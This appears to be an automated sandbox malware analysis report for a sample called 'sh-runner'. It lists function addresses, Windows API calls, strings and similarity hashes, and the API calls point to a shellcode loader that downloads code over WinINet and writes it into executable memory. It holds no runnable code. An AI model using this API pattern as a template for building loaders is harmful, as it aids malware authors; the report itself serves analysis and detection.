Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF72BCD1406), ref: 00007FF72BCD11BE
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF72BCD122F
malloc.MSVCRT ref: 00007FF72BCD1263
strlen.MSVCRT ref: 00007FF72BCD1284
malloc.MSVCRT ref: 00007FF72BCD1290
memcpy.MSVCRT ref: 00007FF72BCD12A8

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandledmemcpystrlen
String ID:
API String ID: 3806033187-0
Opcode ID: 649668102e0e11a526956de2ff727b7b8ba60e3df94765b97e1fcbfe89641749
Instruction ID: 1c2a9839efbdc0471e40fab78810ac9c0c44574b491e72b7693159dd136e4080
Opcode Fuzzy Hash: 649668102e0e11a526956de2ff727b7b8ba60e3df94765b97e1fcbfe89641749
Instruction Fuzzy Hash: 31512939A09A0385E618BB6DED402B9A2A1EF487C5FC44435DE5D477B1DE2CF9C18B24

Function 000001FF24F70020 Relevance: 3.3, APIs: 2, Instructions: 262nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 000001FF24F700EF
NtProtectVirtualMemory.NTDLL ref: 000001FF24F70237

Memory Dump Source

Source File: 00000002.00000003.1847224001.000001FF24F70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF24F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_1ff24f70000_sh-runner.jbxd

Similarity

API ID: MemoryVirtual$AllocateProtect
String ID:
API String ID: 2931642484-0
Opcode ID: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
Instruction ID: ebd5acca2a057ef63e40ab02b199e355e9d06f9c65c3dcc450ac5096b707781e
Opcode Fuzzy Hash: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
Instruction Fuzzy Hash: D67106316186094FE75C9F18D8427BA77E1FFC4314F10563DF986C3292DAB8D8438A86

Function 000001FF24F9D510 Relevance: 1.6, APIs: 1, Instructions: 143
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrGetProcedureAddress.NTDLL ref: 000001FF24F9D627

Memory Dump Source

Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd

Similarity

API ID: AddressProcedure
String ID:
API String ID: 3653107232-0
Opcode ID: c880d098a533d0f3fb35a3b8b130c654e78c7eb0b2f2c7cb6df4c980cc83c31e
Instruction ID: 59d6d5c3b699a2e2b1f66ce69cf175eb716f800e7707501a13577c30258c06ce
Opcode Fuzzy Hash: c880d098a533d0f3fb35a3b8b130c654e78c7eb0b2f2c7cb6df4c980cc83c31e
Instruction Fuzzy Hash: 5241A431218A058FE798DB18D885BF673F0FFD5314F64453DE48AC3256EAA1E9438B86

Function 000001FF24FA36F0 Relevance: .1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f85d6cc5d146f678718de6328ed8eda05c9f040f0331ba1138b2b3f728f502a
Instruction ID: 40c05c23435198ad5d014ae3515b043ab2b36889f7f4ee207b631357c95731f2
Opcode Fuzzy Hash: 0f85d6cc5d146f678718de6328ed8eda05c9f040f0331ba1138b2b3f728f502a
Instruction Fuzzy Hash: AC310C7051CB898FD7A4DF09D846BAABBE0FBD9710F14496EE08993211D7B1E8418B93

Function 000001FF24FA3830 Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208e31ad857d5dcce3a280dcc57152d1db46a14ad4ea6d6d8807739142cc44ce
Instruction ID: f2c0d065304e3bffcaadcde016a792626ae8ff79107ecbd64ca2b7f6d16ac506
Opcode Fuzzy Hash: 208e31ad857d5dcce3a280dcc57152d1db46a14ad4ea6d6d8807739142cc44ce
Instruction Fuzzy Hash: A1213970518B458FD764DF08C485BAABBF1FFC9314F14496EE08D97251CBB5A8418B83

Function 000001FF24FA4310 Relevance: .1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3088a54474c0704e3a01d6a7ced4b2ede53a839219b38387c72ab5f3a59fde9
Instruction ID: fd7483ffd3066ec6b891cef12394b92fcd84ee3f34bd5201740d0651cac2abfe
Opcode Fuzzy Hash: c3088a54474c0704e3a01d6a7ced4b2ede53a839219b38387c72ab5f3a59fde9
Instruction Fuzzy Hash: 2C115E70528B498FE784EB18C48ABBAB7E0FFD8300F50447EA489C3261C7B4D441CB42

Function 000001FF24FA3EF0 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c6d45573732ca76e4f0fa793a294bb48da95218d991d8302224f0b43042d479
Instruction ID: c153491b4bc55ef230d1fc4ca40b7843c4c2cea8ad47f920e78169e0435618da
Opcode Fuzzy Hash: 4c6d45573732ca76e4f0fa793a294bb48da95218d991d8302224f0b43042d479
Instruction Fuzzy Hash: B1114970528B458FEB88DB08C486BBAB7F0FB98344F54456EA089C3261C7B4E4428F82

Function 000001FF24FA4050 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ca7dfaa4e91de42f9431d4f6194eae6a1f84e47b222d3be94b93e91ba7828c8
Instruction ID: 342f9e3c2e0f449ffb04473230c87bc4b53c2d27ddb3cf56fce1cfe42866b29d
Opcode Fuzzy Hash: 4ca7dfaa4e91de42f9431d4f6194eae6a1f84e47b222d3be94b93e91ba7828c8
Instruction Fuzzy Hash: DD114970528B458FE798DB18C486BAAB7E0FBD8304F50457EA489C7262C7B4D942CB82

Function 000001FF24FA39E0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62bf9022b7866b8cf8bec5915bb64fbe05507ee611e7c9cc273e550b7568e5a4
Instruction ID: e51b9c5a09ae1ea3e814cbdfef45604f86a6a7fae999d293cfd9125f83380be0
Opcode Fuzzy Hash: 62bf9022b7866b8cf8bec5915bb64fbe05507ee611e7c9cc273e550b7568e5a4
Instruction Fuzzy Hash: 93115A30128A558FD748DB08C04ABBAB7E0FBC8704F15457DA48D832A1CBF4DA428B83

Function 000001FF24FA48A0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab3c666c990c68bc9d607ff77fafc9474886ca1d5a46c4580004139ecadac52d
Instruction ID: 059cafec1cef9148b92dffea0a33fa9d5bd202788ef6cb591010659498cb15c3
Opcode Fuzzy Hash: ab3c666c990c68bc9d607ff77fafc9474886ca1d5a46c4580004139ecadac52d
Instruction Fuzzy Hash: AB011E30518A498FE748DB188049BB6B7E0FFC8308F54057DA44DD72A2D7F9DA51CB86

Function 000001FF22F9044E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128
memoryfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 000001FF22F9050E
InternetReadFile.WININET ref: 000001FF22F9052D

Strings

U.;, xrefs: 000001FF22F90467

Memory Dump Source

Source File: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF22F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1ff22f90000_sh-runner.jbxd

Yara matches

Similarity

API ID: AllocFileInternetReadVirtual
String ID: U.;
API String ID: 3591508208-4213443877
Opcode ID: 5690493dc9ff9f8f16933898c455d2a5e8e45ea3ee84a79ee5b969fd92fa3e91
Instruction ID: 9d7b39cb1fc6d4bdd872098d7555a463d7d71b8095e4d8043716c0a4b9992beb
Opcode Fuzzy Hash: 5690493dc9ff9f8f16933898c455d2a5e8e45ea3ee84a79ee5b969fd92fa3e91
Instruction Fuzzy Hash: 49310AA030EB882FF75A01693C6A7362AD9C79A351F1541AFF50DC71E7EC44CC46826A

Function 000001FF22F90366 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
librarynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(696E6977,00000000), ref: 000001FF22F90381
InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 000001FF22F9039C

Strings

wini, xrefs: 000001FF22F9036C

Memory Dump Source

Source File: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF22F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1ff22f90000_sh-runner.jbxd

Yara matches

Similarity

API ID: InternetLibraryLoadOpen
String ID: wini
API String ID: 2559873147-1606035523
Opcode ID: 0662d3df314d0fc764c5b615890f2d42f03bb8aebb061ff02a7170b5085c526b
Instruction ID: 3b4527a9d28d992260bd117a4606203e1e6e8f3d6a47e1289107ccd5f1bd2f0d
Opcode Fuzzy Hash: 0662d3df314d0fc764c5b615890f2d42f03bb8aebb061ff02a7170b5085c526b
Instruction Fuzzy Hash: 80F0E5A060E68C2FE3295E75AC8A9373F9DDB5730931646AFF085C29B7CD514C418225

Function 000001FF22F903B2 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 160
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(00000000,00000003,00000000,00000000), ref: 000001FF22F903CF
VirtualAlloc.KERNEL32 ref: 000001FF22F9050E
InternetReadFile.WININET ref: 000001FF22F9052D

Strings

U.;, xrefs: 000001FF22F90467

Memory Dump Source

Source File: 00000002.00000002.3055198846.000001FF22F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF22F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1ff22f90000_sh-runner.jbxd

Yara matches

Similarity

API ID: Internet$AllocConnectFileReadVirtual
String ID: U.;
API String ID: 1856879514-4213443877
Opcode ID: 6fc8f7e9d39f1beb81a02fe686e0033c171592fa012045b2ecca9d2f46ba6301
Instruction ID: fb3eebb9a2be866c2b95545ed3bd9195a7e5305631ec7d256f18613175555896
Opcode Fuzzy Hash: 6fc8f7e9d39f1beb81a02fe686e0033c171592fa012045b2ecca9d2f46ba6301
Instruction Fuzzy Hash: 3D41267430DF8A2FF71A42281D5577A3BA8EF93711F0142BFE545CA8EBD8848E468365

Function 00007FF72BCF4520 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadDescription.KERNELBASE ref: 00007FF72BCF4567

Part of subcall function 00007FF72BD218D0: WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,-00000008,?,?,?,?,?,?,00007FF72BCF45C8), ref: 00007FF72BD2194B
Part of subcall function 00007FF72BD218D0: GetLastError.KERNEL32(?,?,-00000008,?,?,?,?,?,?,00007FF72BCF45C8), ref: 00007FF72BD21955

Strings

main, xrefs: 00007FF72BCF455D

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: AddressDescriptionErrorLastThreadWait
String ID: main
API String ID: 2915094395-3207122276
Opcode ID: c52a097244dd1071374e55f5b798f0915c8acee24753f9a8faadf6f788744dce
Instruction ID: a768ef7b8424bf83816256b34659a8c605eef9cf72be20e7c561b2ba233f803f
Opcode Fuzzy Hash: c52a097244dd1071374e55f5b798f0915c8acee24753f9a8faadf6f788744dce
Instruction Fuzzy Hash: 79118E21E04A5699EB18FB69EC542EDA360FB44388FD40136DD4C13675DF3CE58ACB60

Function 000001FF24FA1ED0 Relevance: 3.1, APIs: 2, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFiberEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,000168BF,?,?,000001FF24F92904), ref: 000001FF24FA1F66
DeleteFiber.KERNELBASE(?,?,?,?,?,?,?,?,?,?,000168BF,?,?,000001FF24F92904), ref: 000001FF24FA1F8E

Memory Dump Source

Source File: 00000002.00000002.3056344114.000001FF24F90000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF24F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1ff24f90000_sh-runner.jbxd

Similarity

API ID: Fiber$CreateDelete
String ID:
API String ID: 2527733159-0
Opcode ID: e666d9c0b0ba46b256699f288a6e5ecb4e148a06e009019892e951112d41f9a7
Instruction ID: c4f01062c2c116ca53d35894243b17db55c85949c2564e5d510d42af7e2cb1ba
Opcode Fuzzy Hash: e666d9c0b0ba46b256699f288a6e5ecb4e148a06e009019892e951112d41f9a7
Instruction Fuzzy Hash: 58319E30218A058FE790DF28C448BBAB7E1FF98300F6545BDE089CB296DBB4D942CB01

Function 00007FF72BCD14A0 Relevance: 1.9, APIs: 1, Instructions: 382
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF72BCD1EB3

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: 28af41fac67d6db8249826d68bed4cd226c56e348e9a327fe25b39d9c433fe7b
Instruction ID: 55729a54053064dbf58cdbb27f47d7ff35f640b4b694fa0c524ff1665298371d
Opcode Fuzzy Hash: 28af41fac67d6db8249826d68bed4cd226c56e348e9a327fe25b39d9c433fe7b
Instruction Fuzzy Hash: C462C001C19FC681F2065B2EAD012F4A7A0FFFD719F4AE379DA9821532BF6832D58654

Non-executed Functions

Function 00007FF72BD11640 Relevance: 49.6, APIs: 27, Strings: 1, Instructions: 630COMMON

Download Yara Rule

APIs

GetFileInformationByHandleEx.KERNEL32 ref: 00007FF72BD116CE
GetLastError.KERNEL32 ref: 00007FF72BD116E9
CloseHandle.KERNEL32 ref: 00007FF72BD116FB
GetFileInformationByHandleEx.KERNEL32 ref: 00007FF72BD117BA
GetLastError.KERNEL32(?), ref: 00007FF72BD117D0
CloseHandle.KERNEL32(?), ref: 00007FF72BD11CF4
CloseHandle.KERNEL32(?), ref: 00007FF72BD11D17
CloseHandle.KERNEL32 ref: 00007FF72BD11DAA

Strings

, xrefs: 00007FF72BD11845

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: Handle$Close$ErrorFileInformationLast
String ID:
API String ID: 4143594976-3916222277
Opcode ID: 6041d2afa6f88c4f8645b1e749606fb7a06baba142a6ae9def8101eb02a304ff
Instruction ID: 31524bd459aeb4b8d899c5547a6a126e918421b438718d968e30db651a621894
Opcode Fuzzy Hash: 6041d2afa6f88c4f8645b1e749606fb7a06baba142a6ae9def8101eb02a304ff
Instruction Fuzzy Hash: 5152F522A1868249EB28AF39DC003F9A761FF88788F845135DE4D17BE9DF3D9585C720

Function 00007FF72BD34C22 Relevance: 45.2, APIs: 1, Strings: 29, Instructions: 165COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00007FF72BD34DB8

Strings

R14_, xrefs: 00007FF72BD34C7B
R14_, xrefs: 00007FF72BD34D6E
R13_, xrefs: 00007FF72BD34D80
_FIQ, xrefs: 00007FF72BD34CC4
R10_, xrefs: 00007FF72BD34C92
_IRQ, xrefs: 00007FF72BD34D06
R11_, xrefs: 00007FF72BD34C3E
R14_, xrefs: 00007FF72BD34CE8
R13_, xrefs: 00007FF72BD34CD6
R13_, xrefs: 00007FF72BD34C69
_FIQ, xrefs: 00007FF72BD34C99
R14_, xrefs: 00007FF72BD34D43
R13_, xrefs: 00007FF72BD34D55
_SVC, xrefs: 00007FF72BD34D87
_USR, xrefs: 00007FF72BD34C29
R14_, xrefs: 00007FF72BD34D99
_FIQ, xrefs: 00007FF72BD34CEF
R14_, xrefs: 00007FF72BD34D18
HTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL0TPIDR, xrefs: 00007FF72BD34DAB
R13_, xrefs: 00007FF72BD34CFF
R10_, xrefs: 00007FF72BD34C22
R11_, xrefs: 00007FF72BD34CAB
R12_, xrefs: 00007FF72BD34C50
_USR, xrefs: 00007FF72BD34C57
_ABT, xrefs: 00007FF72BD34D31
_UND, xrefs: 00007FF72BD34D5C
R12_, xrefs: 00007FF72BD34CBD
R13_, xrefs: 00007FF72BD34D2A
_USR, xrefs: 00007FF72BD34C82

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcmp
String ID: HTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL0TPIDR$R10_$R10_$R11_$R11_$R12_$R12_$R13_$R13_$R13_$R13_$R13_$R13_$R14_$R14_$R14_$R14_$R14_$R14_$_ABT$_FIQ$_FIQ$_FIQ$_IRQ$_SVC$_UND$_USR$_USR$_USR
API String ID: 1475443563-995318
Opcode ID: f4a0205e7acadd5b3b877972655acb1242bb2a7e1140da83af69dff744d315df
Instruction ID: 9dd4e7e3f49ea9d54a58f9fa39a80d67f722a305d37d56e90bda5acb524a7bc7
Opcode Fuzzy Hash: f4a0205e7acadd5b3b877972655acb1242bb2a7e1140da83af69dff744d315df
Instruction Fuzzy Hash: 48515436B490438BF2BCFA6C98504BAA293DF58304B548439969F877D7CD39F8099F60

Function 00007FF72BD12EB0 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 188COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD1310D
CloseHandle.KERNEL32 ref: 00007FF72BD13159
GetLastError.KERNEL32 ref: 00007FF72BD13172

Strings

\\?\, xrefs: 00007FF72BD12F5B
\\.\, xrefs: 00007FF72BD13129
\??\, xrefs: 00007FF72BD12F63
\??\:\\\.\\\path is not valid, xrefs: 00007FF72BD12F9D, 00007FF72BD131B9, 00007FF72BD131DE
\??\UNC\`original` path is too long, xrefs: 00007FF72BD1319B

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle$ErrorLast
String ID: \??\$\??\:\\\.\\\path is not valid$\??\UNC\`original` path is too long$\\.\$\\?\
API String ID: 1798101686-1231689588
Opcode ID: e961e7a58aaf3d90792703a109b22cecd2206073e839d8f5746194df9f725678
Instruction ID: 363d9b45ff56163e3f3cced6367b44f52b56204c0fcdef123c7dbf502249981e
Opcode Fuzzy Hash: e961e7a58aaf3d90792703a109b22cecd2206073e839d8f5746194df9f725678
Instruction Fuzzy Hash: 6D919662A18B8295EF68EF29DC403E9A361FF44798F84D035D94C4B7A8DF3D9189CB10

Function 00007FF72BD10EA0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 304fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF72BD10F07
memcpy.MSVCRT ref: 00007FF72BD10F33
memset.MSVCRT ref: 00007FF72BD1104E
FindFirstFileW.KERNEL32 ref: 00007FF72BD11059
memcpy.MSVCRT ref: 00007FF72BD110BF
GetLastError.KERNEL32 ref: 00007FF72BD11116
FindClose.KERNEL32 ref: 00007FF72BD11264

Strings

*\\?\\??\:\\\.\\\path is not valid, xrefs: 00007FF72BD10F48

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcpy$Find$CloseErrorFileFirstLastmemset
String ID: *\\?\\??\:\\\.\\\path is not valid
API String ID: 3412300865-1181881060
Opcode ID: cb9ac96185fd0c444c4f9cb3865ab23fab11a97b25199c48f37c8e6470b293e0
Instruction ID: b6b0e79fcb80b39d2d10e0358f4f405abd0d196d7c297f9bab357225fd701ff9
Opcode Fuzzy Hash: cb9ac96185fd0c444c4f9cb3865ab23fab11a97b25199c48f37c8e6470b293e0
Instruction Fuzzy Hash: 44C1E662B1469244FB28AB699C053FDA661FF84BD8F804135DD5C4BBEACF3DD5818720

Function 00007FF72BD23490 Relevance: 13.8, APIs: 9, Instructions: 317fileprocessCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF72BD2355E
memset.MSVCRT ref: 00007FF72BD2357F
Module32FirstW.KERNEL32 ref: 00007FF72BD23591
Module32NextW.KERNEL32 ref: 00007FF72BD235E6
UnmapViewOfFile.KERNEL32 ref: 00007FF72BD23763
CloseHandle.KERNEL32 ref: 00007FF72BD2376F
UnmapViewOfFile.KERNEL32 ref: 00007FF72BD23810
CloseHandle.KERNEL32 ref: 00007FF72BD2381C
CloseHandle.KERNEL32 ref: 00007FF72BD23923

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
